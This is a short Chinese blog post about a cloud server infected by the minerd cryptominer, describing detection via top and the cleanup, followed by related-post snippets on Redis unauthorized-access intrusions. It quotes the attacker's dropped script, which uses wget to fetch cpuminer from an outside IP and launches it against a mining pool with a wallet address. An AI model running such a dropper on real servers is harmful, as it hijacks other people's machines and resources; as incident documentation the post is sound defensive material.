服务器被挖矿minerd

原创 2015年11月20日 16:41:36

用的阿里云服务器,这两天报警,load值高,

看了下管理控制台,近期流量也耗了不少钱

top 看了下 有个进程耗cpu居高不下,

进程:/tmp/minerd

百度了下,原来是个挖矿程序

如果top看不到的话,ps查看每一个进程名,也可以发现端倪

不知道是暴力破解密码还是通过其他漏洞植入的

在/tmp目录下放了一个sh文件

文件内容:

wget http://211.79.60.17/project/cpuminer/pooler-cpuminer-2.4.2-linux-x86_64.tar.gz
tar -xzf pooler-cpuminer-2.4.2-linux-x86_64.tar.gz
setsid /tmp/minerd -a scrypt  -o 31.41.40.25:9327 -u LNZyZEbAfZDGwb3Cca13qjbcKJ2JfqTTkk:1 &

杀掉进程后查看了下定时任务 crontab -l   ,定时任务没有做手脚

目前先修改了登陆密码,后续再观察

【网络安全】我的第一次windows服务器杀毒经历

公司的数据库服务器上有毒,一直没太在意(因为没有人在意,创业公司,问题不严重就没人管)。 今天遇到点问题,就顺手把服务器上的毒清了吧。 快捷键win+ R,打开cmd 输入netstat -an...

通过Redis入侵服务器

通过redis入侵服务器的原理是:利用了redis默认配置,许多用户没有设置访问的key(也就是密码)。然后通过向redis把自己的公钥写入到redis,然后利更改redis的数据库文件配置,把数据写...

Redis3未授权访问漏洞导致服务器被入侵

Redis未授权访问漏洞

Redis未授权访问漏洞客户修复通知

【漏洞概述】 Redis 默认情况下,会绑定在 0.0.0.0:6379,导致Redis服务暴露到公网上。 如果在没有开启认证并且在任意用户可以访问目标服务器的情况下,从而可以未授权访问Redis...

git 分支修改bug应用场景

总结: 1.在dev分支日常开发 2.出现bug,需要立即处理部署 3.  git stash (备份工作区) 或 git commit (提交到本地) dev分支当前修改 4.切换至...
  • silyvin
  • silyvin
  • 2017年11月28日 10:50
  • 39

关于服务被挖矿程序minerd入侵解决方法

今天一早过来,运维同事发现服务器的负载有点异常,打开top一看,发现有个进程一直占用很高的cpu 在opt目录下发现有个异常文件,是个命令文件minerd 在确定跟项目不相关的情况下判断是个木...
  • Hu_wen
  • Hu_wen
  • 2016年07月14日 14:31
  • 24669

阿里云服务器被挖矿程序minerd入侵的终极解决办法

突然发现阿里云服务器CPU很高,执行 top 一看,有个进程minerd尽然占用了200%多的CPU, 百度了一下,查到几篇文章都有人遇到同样问题,解决的办法:http://blog.csdn.net...
  • tjcyjd
  • tjcyjd
  • 2017年01月06日 17:35
  • 18727

使用balancer_by_lua_block做应用层负载均衡

首先感谢章义春大神的openresty,解决了web开发的一些痛点并简化了web开发的复杂度。 需求: 根据url的一个参数,做负载均衡,使得某一个用户总是会被分配到固定的业务服务器上处理,方便后续的...

slack incoming webhook

记录下操作流程吧

CentOS 服务器因 Redis 遭遇挖矿程序 minerd 入侵事件记录

事件经过: 周六早上监控服务器发送报警,连续多次无法建立与一台应用服务器的连接。 情况紧急,登录时发现该应用服务器并没有崩溃。 执行: ps -ef | grep nginx 结果显示相关服...
  • Dancen
  • Dancen
  • 2017年07月18日 17:10
  • 675
内容举报
返回顶部
收藏助手
不良信息举报
您举报文章:服务器被挖矿minerd
举报原因:
原因补充:

(最多只允许输入30个字)